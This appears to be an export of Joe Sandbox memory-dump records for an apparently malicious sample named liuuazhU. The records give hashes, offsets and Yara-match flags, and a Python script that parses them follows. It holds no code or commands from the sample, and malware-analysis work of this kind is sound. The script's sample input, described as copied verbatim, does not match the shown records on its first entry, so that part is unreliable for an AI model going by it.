                                                                                        • Opcode ID: 7aec89355fa156de72087e847214d78a5577ca44bd1e903ac7aeae2caa8061f7
                                                                                        • Instruction ID: df5931f9adf3764d649eeaf30200389638cb2c254ea3147579a58addbb2722af
                                                                                        • Opcode Fuzzy Hash: 7aec89355fa156de72087e847214d78a5577ca44bd1e903ac7aeae2caa8061f7
                                                                                        • Instruction Fuzzy Hash: 1631BBB4D012189FCB14DFAAE980ADEFBF4AF49310F10942AE814B7310C735A941CF98
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22133c8a15ab3806e25cd7ea78303e530d81c86e0b9d2e45bc214cfc4be49936
                                                                                        • Instruction ID: b97cca5ee266dbaead60b98260b467d4960f07d80e654f38dec84cf3eae71445
                                                                                        • Opcode Fuzzy Hash: 22133c8a15ab3806e25cd7ea78303e530d81c86e0b9d2e45bc214cfc4be49936
                                                                                        • Instruction Fuzzy Hash: 3AD1F879B002148FDB04CF99D69499DBBF6BF98710B66909AE509EB371CB34EC41CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f8121afd523d565719fa3746f585eb146af74b2bd59f424e5a82d86b060f601c
                                                                                        • Instruction ID: dcf3ad71f79c74304e254f89282b93b4d40ee7b42d4c8f3a04c92d6eae23f736
                                                                                        • Opcode Fuzzy Hash: f8121afd523d565719fa3746f585eb146af74b2bd59f424e5a82d86b060f601c
                                                                                        • Instruction Fuzzy Hash: 1BD11C79E002188FDB04CFA9CA8499DBBF6FF99310B559096E519AB371CB34ED41CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1791d437c4b82c96564a3325d731cd8c5a49a93951f36b031bcee5101c0e59bc
                                                                                        • Instruction ID: d06e5042206cd530dbef38b2a3ec7282b7a256b0d672d77b100a918cadf854a7
                                                                                        • Opcode Fuzzy Hash: 1791d437c4b82c96564a3325d731cd8c5a49a93951f36b031bcee5101c0e59bc
                                                                                        • Instruction Fuzzy Hash: 6671D2383002118FC7059F39C4A4A6EBBA6AFD8314F14857AE946CB395DF78EC42CB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 89765f5e6df386a5775651caf633a7b7007a5546dbe976bc5abe6db64720f723
                                                                                        • Instruction ID: 208b89a3d89e1939310ef1876cd650ed8bb66451c48dcb618e3ea5a510b75829
                                                                                        • Opcode Fuzzy Hash: 89765f5e6df386a5775651caf633a7b7007a5546dbe976bc5abe6db64720f723
                                                                                        • Instruction Fuzzy Hash: 6251BE3A3142158FC704DF3AC894D6A7BE9AF9964830594FBE909CB366DB21EC01CB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4923e87325845cb5740a0f36de63ee0b2f322b8ce98a8a0a6c608e6bbc2e47ea
                                                                                        • Instruction ID: af49fde906269b5968f10d6510ea28aca2e06fdda4eec356b078046e7fca418f
                                                                                        • Opcode Fuzzy Hash: 4923e87325845cb5740a0f36de63ee0b2f322b8ce98a8a0a6c608e6bbc2e47ea
                                                                                        • Instruction Fuzzy Hash: 14518535D0021A9FCB00DFE0D854ADDFBBAFF9A304F248216F515AB2A5DB74A945CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc84d2dcd5c8a4d5d4f25060cfcf2e29d0eafe8de5bd6636daf4b47e2f1d7ab3
                                                                                        • Instruction ID: 49f2fb36d6e6e3853eb1059af58a38a8ad763af45fdd7e8ea4534d81d99a3839
                                                                                        • Opcode Fuzzy Hash: cc84d2dcd5c8a4d5d4f25060cfcf2e29d0eafe8de5bd6636daf4b47e2f1d7ab3
                                                                                        • Instruction Fuzzy Hash: C341E274E042188BDB24CFBAC8507DEBBF2AF99304F10D0AAD508B7255DB345986CF55
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114604081.0000000028C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C7D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c7d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b8dee547cb6bf8e03d2098fa5b5a8637671a5bf9ab44a97a231424e052a4b19c
                                                                                        • Instruction ID: e11e9bfe040c5eb24decb47874ed4b19e1bb13828815ca321163941a27359ab8
                                                                                        • Opcode Fuzzy Hash: b8dee547cb6bf8e03d2098fa5b5a8637671a5bf9ab44a97a231424e052a4b19c
                                                                                        • Instruction Fuzzy Hash: 12214D7110E3C09FC7038B24D994701BF75EB46214F29C5DBD9888F2A7C33A984ACB62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114604081.0000000028C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C7D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c7d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 379b830a4270612faaf0a20d99c15426c8f4c8e28f6c16741ae8b1a297c93bb2
                                                                                        • Instruction ID: 98f7c6bb95e66e25ee2b24a9ad82ae42e477edfedd55bba9157398b5b6e8386c
                                                                                        • Opcode Fuzzy Hash: 379b830a4270612faaf0a20d99c15426c8f4c8e28f6c16741ae8b1a297c93bb2
                                                                                        • Instruction Fuzzy Hash: 5D21F271504204DFCB00DF14EAC0F16BBB9EB88314F24C569DA494B3DAC33AE847CA62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b92aa25b9918ced7fa90efa2f1161362b6335727ae33612e79fb8cf272db4bd9
                                                                                        • Instruction ID: a73ca78318011375a87a4c86261ea45995c0adcd9c036c43994209710671bf5d
                                                                                        • Opcode Fuzzy Hash: b92aa25b9918ced7fa90efa2f1161362b6335727ae33612e79fb8cf272db4bd9
                                                                                        • Instruction Fuzzy Hash: 00115E39B002049FDB049F59D884A9ABBF9FB9C714F10916AE915E7350CB71AC11CB94
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea5952a1aac14c85c389f9067ecdfa44abc9024ecc27bb20369267e60cbbe230
                                                                                        • Instruction ID: e2d80314289e16a5032d6e5243f80a3795b310f59d93e42b6f49de039645d0e5
                                                                                        • Opcode Fuzzy Hash: ea5952a1aac14c85c389f9067ecdfa44abc9024ecc27bb20369267e60cbbe230
                                                                                        • Instruction Fuzzy Hash: C021AC34900308DFCB14CF58C848BAABBF5FB58314F00946AE58A8B312E374E905CFA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cda88d5117323346fb1dd8a98427706234dac0292348f4fef30ea0ecae64f320
                                                                                        • Instruction ID: 8f28dad2e5857a5c1fdbf0b737854f6f728c0f71d58ae3e4918e8cb8a7c000b9
                                                                                        • Opcode Fuzzy Hash: cda88d5117323346fb1dd8a98427706234dac0292348f4fef30ea0ecae64f320
                                                                                        • Instruction Fuzzy Hash: 3C018636B011146F8B059E999810AAF3BABDBDC690F24C02BF515D7340DE71EC119BA0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114473377.0000000028C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c6d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e09e81388cc996a5b24d4b283138c57bb8a8f4ed8f1c20831ab083fd86c8d3cb
                                                                                        • Instruction ID: 2eb354fc6dd7ae51e6a0be118c9103013a4b13d8e87094440e45a7a65229634f
                                                                                        • Opcode Fuzzy Hash: e09e81388cc996a5b24d4b283138c57bb8a8f4ed8f1c20831ab083fd86c8d3cb
                                                                                        • Instruction Fuzzy Hash: C901526100E3C09ED7124B359894752BFB4EF43224F1DC1DBD9888F1A7C2699849C772
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3114473377.0000000028C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 28C6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_28c6d000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a3f9aa7271f15cbe363b075642b4406d657ea35d9da71e492ab88e63a63abcd
                                                                                        • Instruction ID: 3ed027c785d25844f26ce3f88ab9a369892e0a2f41037debb781de04cf9a020b
                                                                                        • Opcode Fuzzy Hash: 2a3f9aa7271f15cbe363b075642b4406d657ea35d9da71e492ab88e63a63abcd
                                                                                        • Instruction Fuzzy Hash: 8C01D47100A3509AE7104A27E9C0B57BF98EFC5334F18C53AEE480A286C77AA842C6B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a81aa4abea7eb293cb69b5d1112584c5ec625f8d043218db46d42a48b90c0e12
                                                                                        • Instruction ID: 37d5621a93aa41a08b5660347b6e94095f37e4753e3b66cde93930af8cd1f873
                                                                                        • Opcode Fuzzy Hash: a81aa4abea7eb293cb69b5d1112584c5ec625f8d043218db46d42a48b90c0e12
                                                                                        • Instruction Fuzzy Hash: 92F06239310A144B87155E2F9454A2B77DDBFDAE95351107BFE0DC7365DEA0CC028798
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2bbbaeba9b98cd82211ce76fca6e60d3fd275e1452645cdb758dd309978af432
                                                                                        • Instruction ID: 9febbb6c83105fb7baab290f7542b63ce7ae859e1556a2434e0c0a289cbf8aab
                                                                                        • Opcode Fuzzy Hash: 2bbbaeba9b98cd82211ce76fca6e60d3fd275e1452645cdb758dd309978af432
                                                                                        • Instruction Fuzzy Hash: DCE0C2B04097880ED702E370A985799BF65AB81209F088561A8894A2ABDFAC994E4390
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 339f6825c33659486c707153a34f332baa2c8bc45f8029ac3b0b28105499131b
                                                                                        • Instruction ID: 5068df02f18188ad23522b39686eaf6a16bda6ca806fe57be821c18a465119e6
                                                                                        • Opcode Fuzzy Hash: 339f6825c33659486c707153a34f332baa2c8bc45f8029ac3b0b28105499131b
                                                                                        • Instruction Fuzzy Hash: CAD0673AB40118EFCB049F99E8408DDFBB6FB98221B148156E915A3261CA319961DB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.3120056947.000000002E4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2E4C0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_2e4c0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9cf396fd899176bddf135fc356123f9ea838ec3e34f34297c91a133c70611875
                                                                                        • Instruction ID: fdfe9bf252db557716d9b735bba14f94716c12787889b570f6c16cb5264c349a
                                                                                        • Opcode Fuzzy Hash: 9cf396fd899176bddf135fc356123f9ea838ec3e34f34297c91a133c70611875
                                                                                        • Instruction Fuzzy Hash: 40C012300446084FC705E775D9C6A96B72AA7C02007548530900A0676ADFB8989E46E0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3886058894-0
                                                                                        • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                        • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
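The records above are the plain-text export of the report's per-function "Memory Dump Source" entries. The following Python is an added example, not code from Joe Sandbox or from this report, that parses that layout into one dict per record so the functions can be grouped by dump region (the "Offset" and "based on PE" values the report prints) and the ones that resolved an API name can be listed. It assumes only the layout visible on the page (a "Memory Dump Source" header followed by "• Key: value" lines, with section labels such as "Similarity" or "Yara matches" in between) and treats the "Download File" text fused onto the "Associated" file names as the report's link label rather than part of the name; it makes no claim about the meaning of the dotted fields inside the .sdmp file names. The sample input is two records copied from the page.

```python
import re
from collections import Counter

# Constructed sample input: two records copied verbatim from the report text,
# one function in the non-PE region at 0x2A6B0000 and one in the PE image at 0x400000.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000B.00000002.3115757303.000000002A6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A6B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2a6b0000_liuuazhU.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 7aec89355fa156de72087e847214d78a5577ca44bd1e903ac7aeae2caa8061f7
• Instruction ID: df5931f9adf3764d649eeaf30200389638cb2c254ea3147579a58addbb2722af
• Opcode Fuzzy Hash: 7aec89355fa156de72087e847214d78a5577ca44bd1e903ac7aeae2caa8061f7
• Instruction Fuzzy Hash: 1631BBB4D012189FCB14DFAAE980ADEFBF4AF49310F10942AE814B7310C735A941CF98
APIs
Memory Dump Source
• Source File: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000001.1965196360.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
• Associated: 0000000B.00000001.1965196360.000000000043C000.00000040.00000001.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_1_400000_liuuazhU.jbxd
Yara matches
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
• Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
• Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
• Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
"""

RECORD_HEADER = "Memory Dump Source"
# "• Key: value" lines; the bullet is optional so a copy without it still parses
FIELD_RE = re.compile(r"^(?:•\s*)?([^:]+?):\s*(.*)$")
# The "Source File" value as printed on the page: <name>.sdmp, Offset: <hex>, based on PE: true|false
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_records(text):
    """Split the report text into one dict per 'Memory Dump Source' record."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == RECORD_HEADER:
            current = {"associated": []}
            records.append(current)
            continue
        m = FIELD_RE.match(line) if current is not None else None
        if not m:
            continue  # section labels ("Similarity", "APIs", "Yara matches") carry no field
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            s = SOURCE_RE.match(value)
            current["source_file"] = s.group("file") if s else value
            current["offset"] = int(s.group("offset"), 16) if s else None
            current["based_on_pe"] = (s.group("pe") == "true") if s else None
        elif key == "Associated":
            # "Download File" is the report's link label fused onto the name by text extraction
            current["associated"].append(value.replace("Download File", "").strip())
        else:
            current[key.lower().replace(" ", "_")] = value  # e.g. "Opcode ID" -> opcode_id
    return records


def summarize(records):
    """Functions per (offset, based_on_pe) region, and which ones resolved an API name."""
    per_region = Counter((r["offset"], r["based_on_pe"]) for r in records)
    api_hits = [(r["offset"], r["api_id"]) for r in records if r.get("api_id")]
    return per_region, api_hits


def inconsistent_opcode_ids(records):
    """Opcode ID and Opcode Fuzzy Hash carry the same value on every record of this report;
    a mismatch points at a garbled or truncated copy of the record, so flag it."""
    return [r.get("opcode_id", "") for r in records
            if r.get("opcode_id", "") != r.get("opcode_fuzzy_hash", "")]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    per_region, hits = summarize(recs)
    for (offset, pe), n in sorted(per_region.items()):
        print(f"region 0x{offset:08X} (based on PE: {pe}): {n} function(s)")
    for offset, api in hits:
        print(f"  0x{offset:08X} -> {api}")
    print("inconsistent records:", inconsistent_opcode_ids(recs))
```

Run against the full text export of this section, the per-region counts show how many decompiled functions sit in the non-PE regions (0x2E4C0000, 0x2A6B0000, 0x28C6D000, 0x28C7D000) versus the PE image at 0x400000, and the API hits give the few functions whose imports Joe Sandbox could name; the other fields (Instruction ID, the two fuzzy hashes) are kept as strings for pivoting to other reports without assigning them any meaning the page does not state.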